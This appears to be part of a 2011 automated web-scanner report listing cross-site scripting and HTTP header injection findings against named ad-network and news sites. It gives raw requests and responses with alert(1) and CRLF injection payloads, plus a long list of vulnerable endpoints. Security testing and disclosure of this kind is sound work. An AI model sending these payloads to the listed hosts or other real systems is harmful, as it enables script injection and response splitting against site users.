HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=951:5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=20:19:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "aa1b9a-8952-4accb58ae5040" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=21 Expires: Sat, 17 Sep 2011 01:49:37 GMT Date: Sat, 17 Sep 2011 01:49:16 GMT Content-Length: 2692 Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994"';var zzCustom='';var zzTitle=''; if(typeof zzStr=='undefined'){ var zzStr="q=5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";z="+Math.random();}
if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';
var zzhasAd=undefined;
...[SNIP]...
2.4. http://livechat.iadvize.com/chat_init.js [vuid cookie]
Summary
Severity: High
Confidence: Certain
Host: http://livechat.iadvize.com
Path: /chat_init.js
Issue detail
The value of the vuid cookie submitted to the URL /chat_init.js is copied into the HTML document as plain text between tags at the URL /chat_init.js. The payload 2e364<script>alert(1)</script>b793934a58c was submitted in the vuid cookie. This input was returned unmodified in a subsequent request for the URL /chat_init.js.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
GET /chat_init.js?sid=1821 HTTP/1.1 Host: livechat.iadvize.com Proxy-Connection: keep-alive Referer: http://www.mailjet.com/features User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364<script>alert(1)</script>b793934a58c; 1821vvc=3; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D
Request 2
GET /chat_init.js?sid=1821 HTTP/1.1 Host: livechat.iadvize.com Proxy-Connection: keep-alive Referer: http://www.mailjet.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 1821vvc=2; vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62
Response 2
HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Fri, 16 Sep 2011 21:55:08 GMT Content-Type: text/javascript; charset=utf-8 Connection: keep-alive P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR" Set-Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb793934a58c; expires=Sun, 15-Sep-2013 21:55:08 GMT; path=/ Set-Cookie: 1821_idzp=%7B%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%2C%22site_id%22%3A1821%2C%22lang%22%3A%22en%22%2C%22pageview%22%3A6%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2F%22%2C%22timeElapsed%22%3A21936835.13%2C%22navTime%22%3A1316210108000%7D; path=/ Expires: Mon, 22 Jan 1978 12:00:00 GMT Cache-Control: no-cache Pragma: no-cache Vary: Accept-Encoding Content-Length: 42132
if(typeof(iAdvize) !== 'object'){ if (/Safari/.test(navigator.userAgent) && !(/Chrome/.test(navigator.userAgent))) { var Sbody = document.getElementsByTagName( 'BODY' )[ 0 ]; var newNode = docume ...[SNIP]...
iframe.name = name; iframe.src = 'javascript:false'; div.appendChild(iframe); form.action = 'http://livechat.iadvize.com/saveuid.php?sid=1821&vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364<script>alert(1)</script>b793934a58c'; form.method = 'POST'; form.target = name; div.appendChild(form); form.submit(); }, 10); }
if(typeof(iAdvize2) === 'undefined'){ iAdvize2 = {} }
/*! LAB.js (LABjs :: Loading And Blockin ...[SNIP]...
3. HTTP header injection
There are 4 instances of this issue:
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
3.1. http://2912a.v.fwmrm.net/ad/l/1 [cr parameter]
Summary
Severity: High
Confidence: Certain
Host: http://2912a.v.fwmrm.net
Path: /ad/l/1
Issue detail
The value of the cr request parameter is copied into the Location response header. The payload d8d28%0d%0aeb92866aa30 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
Request
GET /ad/l/1?last=1&ct=0&metr=0&s=b035&t=1316221067347346&adid=661886&reid=352172&arid=0&auid=&cn=defaultImpression&et=i&_cc=661886,352172,,12523.,1316221067,1&tpos=&init=1&cr=d8d28%0d%0aeb92866aa30 HTTP/1.1 Host: 2912a.v.fwmrm.net Proxy-Connection: keep-alive Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221068.28800.0.0,"; _wr="g193954"
Response
HTTP/1.1 302 Found Set-Cookie: _uid="b139_5653128498656399883";expires=Sun, 16 Sep 2012 01:09:18 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _auv="g193954~1.1316221551.0,5.1316221758.0,21966.1316221551.0,21967.1316221758.0,^";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _vr="1316221757.58849.648140~648142~661884~661886~664345~,1316221527.58849784063c197da02440673a1ca.664345~,1316221526.784063c1d09056819c7a889b.661884~661886~,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _cph="1316221670.1103.1.1,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/; Set-Cookie: _sc="sg193954.1316221067.1316221758.28800.0.68412102,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/; Location: d8d28 eb92866aa30 Content-Length: 0 Date: Sat, 17 Sep 2011 01:09:17 GMT Server: FWS P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
3.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-507/d3/jsc/fm.js
Issue detail
The value of the $ request parameter is copied into the Set-Cookie response header. The payload b4e04%0d%0adcb62044598 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
Request
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=b4e04%0d%0adcb62044598&s=2&z=0.2868958928156644 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=951:b4e04 dcb62044598,collective728x9057523';expires=Sat, 17 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=92:91:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "aa1b9a-8952-4accb58ae5040" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=18 Expires: Sat, 17 Sep 2011 01:50:08 GMT Date: Sat, 17 Sep 2011 01:49:50 GMT Content-Length: 2624 Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=2;var zzPat='b4e04 dcb6 ...[SNIP]...
3.3. http://d7.zedo.com/utils/ecSet.js [v parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /utils/ecSet.js
Issue detail
The value of the v request parameter is copied into the Set-Cookie response header. The payload 1bc99%0d%0af3d004c45 was submitted in the v parameter. This caused a response containing an injected HTTP header.
Request
GET /utils/ecSet.js?v=1bc99%0d%0af3d004c45&d=.zedo.com HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; aps=2; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1 Content-Type: application/x-javascript Set-Cookie: 1bc99 f3d004c45;expires=Mon, 17 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path=/; ETag: "3a9d5cb-1f5-47f2908ed51c0" Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=5099 Date: Sat, 17 Sep 2011 01:49:02 GMT Connection: close
3.4. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]
Summary
Severity: High
Confidence: Certain
Host: http://usadmm.dotomi.com
Path: /dmm/servlet/dmm
Issue detail
The value of the rurl request parameter is copied into the Location response header. The payload f8960%0d%0a9818607d76e was submitted in the rurl parameter. This caused a response containing an injected HTTP header.
Request
GET /dmm/servlet/dmm?rurl=f8960%0d%0a9818607d76e&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000187%2C826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1986338424%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5
Response
HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 01:49:27 GMT
X-Name: dmm-s01
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Mon, 16-Sep-2013 01:49:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 01:49:27 GMT; Path=/
Location: http://usadmm.dotomi.com/dmm/servlet/f8960
9818607d76e
Content-Length: 0
Content-Type: text/plain
4. Cross-site scripting (reflected)
There are 256 instances of this issue:
- http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]
- http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]
- http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]
- http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]
- http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
- http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
- http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]
- http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]
- http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]
- http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]
- http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]
- http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]
- http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]
- http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]
- http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]
- http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]
- http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]
- http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]
- http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]
- http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
- http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
- http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]
- http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]
- http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]
- http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]
- http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]
- http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]
- http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]
- http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]
- http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]
- http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]
- http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]
- http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]
- http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]
- http://ad.yieldmanager.com/imp [u parameter]
- http://adnxs.revsci.net/imp [Z parameter]
- http://adnxs.revsci.net/imp [s parameter]
- http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
- http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
- http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
- http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
- http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
- http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
- http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
- http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]
- http://api.bizographics.com/v2/profile.redirect [api_key parameter]
- http://api.dimestore.com/viapi [id parameter]
- http://ar.voicefive.com/b/rc.pli [func parameter]
- http://b.scorecardresearch.com/beacon.js [c1 parameter]
- http://b.scorecardresearch.com/beacon.js [c10 parameter]
- http://b.scorecardresearch.com/beacon.js [c15 parameter]
- http://b.scorecardresearch.com/beacon.js [c2 parameter]
- http://b.scorecardresearch.com/beacon.js [c3 parameter]
- http://b.scorecardresearch.com/beacon.js [c4 parameter]
- http://b.scorecardresearch.com/beacon.js [c5 parameter]
- http://b.scorecardresearch.com/beacon.js [c6 parameter]
- http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]
- http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]
- http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]
- http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]
- http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
- http://blekko.com/autocomplete [query parameter]
- http://bostonherald.com/includes/processAds.bg [companion parameter]
- http://bostonherald.com/includes/processAds.bg [companion parameter]
- http://bostonherald.com/includes/processAds.bg [page parameter]
- http://bostonherald.com/includes/processAds.bg [page parameter]
- http://bostonherald.com/includes/processAds.bg [position parameter]
- http://bostonherald.com/includes/processAds.bg [position parameter]
- http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
- http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
- http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]
- http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
- http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]
- http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]
- http://cdnt.meteorsolutions.com/api/track [jsonp parameter]
- http://choices.truste.com/ca [c parameter]
- http://choices.truste.com/ca [cid parameter]
- http://choices.truste.com/ca [iplc parameter]
- http://choices.truste.com/ca [plc parameter]
- http://choices.truste.com/ca [zi parameter]
- http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
- http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
- http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]
- http://event.adxpose.com/event.flow [uid parameter]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]
- http://g2.gumgum.com/services/get [callback parameter]
- http://ib.adnxs.com/ptj [redir parameter]
- http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]
- http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]
- http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
- http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
- http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]
- http://js.revsci.net/gateway/gw.js [ali parameter]
- http://js.revsci.net/gateway/gw.js [cid parameter]
- http://js.revsci.net/gateway/gw.js [clen parameter]
- http://js.revsci.net/gateway/gw.js [csid parameter]
- http://js.revsci.net/gateway/gw.js [p parameter]
- http://js.revsci.net/gateway/gw.js [pid parameter]
- http://js.revsci.net/gateway/gw.js [pli parameter]
- http://js.revsci.net/gateway/gw.js [ref parameter]
- http://js.revsci.net/gateway/gw.js [sid parameter]
- http://js.revsci.net/gateway/gw.js [ver parameter]
- http://js.revsci.net/gateway/gw.js [vid parameter]
- http://livechat.iadvize.com/rpc/referrer.php [get parameter]
- http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
- http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
- http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
- http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
- http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 4]
- http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 5]
- http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 6]
- http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090 [callback parameter]
- http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27 [callback parameter]
- http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7 [callback parameter]
- http://pixel.adsafeprotected.com/jspix [anId parameter]
- http://pixel.adsafeprotected.com/jspix [campId parameter]
- http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
- http://pixel.adsafeprotected.com/jspix [pubId parameter]
- http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
- http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
- http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
- http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
- http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 2]
- http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]
- http://router.infolinks.com/gsd/1316238723013.0 [callback parameter]
- http://router.infolinks.com/gsd/1316238747946.0 [callback parameter]
- http://router.infolinks.com/gsd/1316238789101.0 [callback parameter]
- http://router.infolinks.com/gsd/1316238970770.0 [callback parameter]
- http://router.infolinks.com/gsd/1316239040251.0 [callback parameter]
- http://router.infolinks.com/gsd/1316239125269.0 [callback parameter]
- http://router.infolinks.com/gsd/1316239185968.0 [callback parameter]
- http://router.infolinks.com/gsd/1316239193603.0 [callback parameter]
